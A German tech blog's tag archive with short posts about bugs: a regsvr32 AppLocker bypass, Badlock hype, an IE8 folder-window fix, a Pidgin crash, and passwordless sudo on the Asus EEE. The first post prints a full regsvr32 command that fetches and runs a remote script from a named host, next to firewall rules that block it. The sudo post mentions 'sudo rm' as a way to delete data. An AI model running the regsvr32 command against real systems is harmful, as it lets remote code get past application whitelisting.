Tag Archives: Bug

Regsvr32 und Remote-Scripts – der darf das wirklich?

Mal ganz ehrlich: Wer hat gewusst, dass man mit regsvr32 auch Scripts von einem Remote-Host herunterladen und ausführen kann? Also ich erst seit einem entsprechenden Artikel von Casey Smith

Und die Problematik ist gar nicht mal so unbedeutend: Auf einem einfachen Client mit laufendem AppLocker können nicht einfach so beliebige neue / unbekannte Prozesse gestartet werden. Da ist es doch ideal, wenn man einen bestehenden verwenden kann wie regsvr32, der auf jedem Windows-System schon vorhanden ist. Noch besser, wenn man damit noch die nötigen Ressourcen von einem Remote-Host nachladen und gleich ausführen kann…

Alles was man braucht ist Zugang zu einer Shell und ein Kommando abzusetzen:

regsvr32 /s /n /u /i:http://encodingit.ch/poc.sct scrobj.dll

Auf der Gegenseite braucht es nun nur noch das passende File mit ein bisschen XML und JavaScript und schon kann jede beliebige Aktion über einen simplen HTTP-Request ausgeführt werden:

regsvr32

Gerade jetzt, wo die Malware-Thematik aktueller ist als je zuvor und so Lock-Down-Applikationen wie AppLocker als gute Lösung gehandelt werden, sind solche Spielereien tödlich!

Ein Fix ist aktuell noch nicht verfügbar, lediglich das Einschränken von regsvr32.exe mittels einer SW-Firewall bietet einen Workaround:

netsh advfirewall firewall add rule name="Block regsvr32" dir=out action=block program="C:\Windows\System32\regsvr32.exe" enable=yes
netsh advfirewall firewall add rule name="Block regsvr32(x64)" dir=out action=block program="C:\Windows\SysWOW64\regsvr32.exe" enable=yes

Hoffen wir mal, dass Microsoft bald nachzieht…

BADLOCK – Most Overhyped Bug

Badlock ist sicherlich jedem ein Begriff – genug darüber geschrieben und gesprochen wurde ja schliesslich in vergangener Zeit:

Doch wieso wurde diesem Bug so viel Aufmerksamkeit geschenkt, wieso hat der Bug ein Logo und einen Namen während Andere nur eine CVE-Nummer bekommen?
Eigentlich liegt der Schluss somit ja nahe, dass er kritischer oder heikler ist als andere… Ist somit spezielle Vorsicht nötig?

Problematisch ist sicherlich die Entwicklung, welche der Bug durchgemacht hat: Vor knapp einem Monat wurde die Lücke veröffentlicht, jedoch nur mit dem Namen, einem coolen Logo und ohne zusätzliche Details. Da die Medien dies ziemlich schnell aufgriffen, fingen die wildesten Spekulationen an, welche Software-Teile betroffen sein könnten oder wie weitrechend die Auswirkungen wirklich sind… Dazugekommen ist, dass der Name auch sehr viel Spielraum für Spekulationen offen lässt und auf den ersten Blick vielleicht eher in Richtung Locking und Concurrent Programming führen könnte.

Jetzt, nachdem die Details bekannt sind, muss man sicherlich auch mal relativieren: Der Bug ist durchaus heikel, aber nicht so heikel, dass man jetzt in Panik verfallen müsste, wie das auch schon bei z.B. Shellshock der Fall war. Versteht mich nicht falsch, ich sage nicht, man soll die Lücke nicht patchen und schliessen, aber das geht auch wie bei jedem anderen Bug sonst auch und braucht keine 1-monatige Marketingkampagne bevor einzelne Infos darüber veröffentlicht werden. Das ist simple Effekthascherei…
Und schliesslich kann jeder einem Bug einen Namen und ein Logo geben, das ändert aber noch lange nichts an der Wichtigkeit oder der Reichweite eines einzelnen Bugs. Badlock hat auch „nur“ eine CVSS score von 7.1 erhalten und selbst Microsoft stuft den Fix nur als „Wichtig“ und nicht „Kritisch“ ein…

Ich denke mal, wir befinden uns hier auf einem guten Weg für den Pwnie Award „Most Overhyped Bug“… 🙂

Neuer Ordner, neues Fenster

Zwischendurch bin ich immer mal wieder gezwungen Windows zu booten, da meine Firma nichts anderes zulässt.

Doch seit kurzem habe ich das Problem, dass sich jeder Ordner in einem neuen Fenster öffnet. Dies ist insofern komisch, da ich nichts an irgendwelchen Settings verändert habe und diese alle richtig eingestellt sind.

Und um normal zu arbeiten ist es sehr müsam, da ich der Übersicht halber auf tiefe Ordnerstrukturen stehe. Somit habe ich auf der Suche nach einem Dokument schnell mal 10 Ordner-Fenster offen!

Also habe ich mich auf die Suche nach einer Lösung gemacht. Hier machen wir doch gleich mal einen Google-Vergleich:

google1

Ich bin also nicht alleine mit meinem Problem, und nach einer kleinen Suche wusste ich, dass der IE8 schuld an dem Fehler hat!

Um diesen zu beheben, muss man in den Internetoptionen im Reiter Allgemein unter Registerkarten auf Einstellungen klicken. Danach bei Schnellregisterkarten den Hacken entfernen.

Nach einem Bestätigen mit OK läuft alles wieder wunderbar!

Und schon habe ich wieder einen Grund mehr Linux zu verwenden…

Error in Pidgin

Eigentlich war ich bis lang immer sehr zufrieden mit dem Standard-IM von Ubuntu Pidgin!

Doch jetzt will er plötzlich nicht mehr und schmiert immer ab…

Alles was er noch hinbekommt, ist sein Trayicon kurz in die Taskleiste zu laden und dann ist es auch schon wieder fertig.

Also mache ich mich mal auf die Suche nache dem .Pidgin Ordner im Homeverzeichnis! Eigentlich wollte ich da meine ICQ ID aus dem Konfig File löschen, da Pidgin seit dem Hinzufügen von meinem ICQ Account nicht mehr richtig funzt! Doch nichts da… Einen .Pidgin-Ordner gibt es einfach nicht, da Pidgin mit seiner Software mal wieder eine Extrawurst braucht, als sich an diesen ungeschriebenen Standard zu halten…

Naja was solls, nach kurzer Zeit googeln habe ich mein bescheidenes Wissen wieder ein bisschen erweitern können: der .Pidgin Ordner heisst eigentlich .purple! Die Frage nach dem wieso .purple lass ich hier mal ganz diskret weg…

Also lösche ich den kompletten .purple Ordner, und setze Pidgin somit wieder auf seinen Grundzustand zurück. Dann folgt das ganze Konfig Prozedere noch einmal und siehe da, er scheint zu funktionieren – Naja beinahe! Es funktioniert genau so lange, bis Pidgin mit dem MSN Server in Verbindung tretten soll! Und dann ist wieder schluss! Bumm, und Pidgin ist abgestürzt…

Voller Sorge, meine Chatter-Karriere vorzeitig beenden zu müssen, mache ich mich auf die Suche nache einem andern, ebenbürdigen Instant Messenger… Und ich wurde fündig!

Ein IM namens emesene erfüllt all meine Anforderungen und ist dabei noch klar und strukturiert designt und aufgebaut, so dass ich mich schnell damit zurecht finden und Pidgin auch schnell deinstallieren konnte.

Nun ist meine Welt wieder in Ordnung

Sudo, die Freikarte zum Asus EEE

Sudo heisst der Befehl um im Terminal unter Linux etwas als root auszuführen.

Unter Windows kennt man sowas nicht, da die meisten Benurzer sowiso mit Adminrechten arbeiten und sich auch als Admin (unter Linux heisst der root) einloggen!

Unter Linux ist dies nicht so. Da loggt man sich als normalen User ein und führt dann installationen etc mit adminrechten aus, indem man den Befehl sudo verwendet.

Dieser Befehl sudo wird beim Ausetzen des OS mit dem root-Password verknüpft

Nun was hat dies mit dem Asus EEE zu tun:

Das Betriebsystem vom Asus EEE ist ein Linux. Zwar eine abgeänderte Version doch es ist ein Linux! Was heisst, auch das Terminal wird von Linux übernommen und damit auch alle Befehle! Inklusive sudo!

Doch der Befehl sudo alleine wäre noch nicht so schlimm, da man ja ein root-Password setzen muss! Nun gibt es im Config-File aber ein Einträg, der das alles ausser Kraft setzt:

sudo **

Dies hat zur folge, dass der sudo Befehl auch ohne dass man das root-Password kennt, ausführen oder gebrauchen kann!

Doch dies ist nicht etwa ein Bug! Dies wurde von Asus absichtlich eingebaut:

Weil immer mehr Leute sich nicht mehr ans root-password erinnern konnten, welches sie am Anfang einmal definiert hatten, konnten sie plötzlich nichts mehr als root ausführen, da sudo ohne obigen Eintrag in das config-File das root-Password verlangt!

Dieses Wissen kann in den falschen Händen grossen Schaden anrichten da man mit einem einfachen Befehl wie

sudo rm

problemlos Daten löschen kann!